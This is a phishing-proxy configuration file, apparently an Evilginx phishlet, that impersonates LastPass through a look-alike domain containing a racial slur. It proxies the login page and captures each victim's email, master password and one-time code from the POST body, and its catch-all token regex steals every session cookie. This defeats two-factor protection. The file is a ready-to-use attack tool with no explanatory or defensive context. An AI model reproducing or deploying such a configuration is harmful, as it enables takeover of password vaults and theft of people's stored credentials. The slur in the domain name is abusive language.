min_ver: '2.4.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'nigga-lastpass.com', session: true, is_landing: false}
sub_filters:
  - {triggers_on: 'nigga-lastpass.com', orig_sub: '', domain: 'nigga-lastpass.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
auth_tokens:
  - domain: 'nigga-lastpass.com'
    keys: ['.*,regexp']
auth_urls:
  - '/null'
credentials:
  username:
    key: 'email'
    search: '(.*)'
    type: 'post'
  password:
    key: 'masterPassword'
    search: '(.*)'
    type: 'post'
  custom:
    key: 'code'
    search: '(.*)'
    type: 'post'
login:
  domain: 'nigga-lastpass.com'
  path: '/?ac=1&lpnorefresh=1'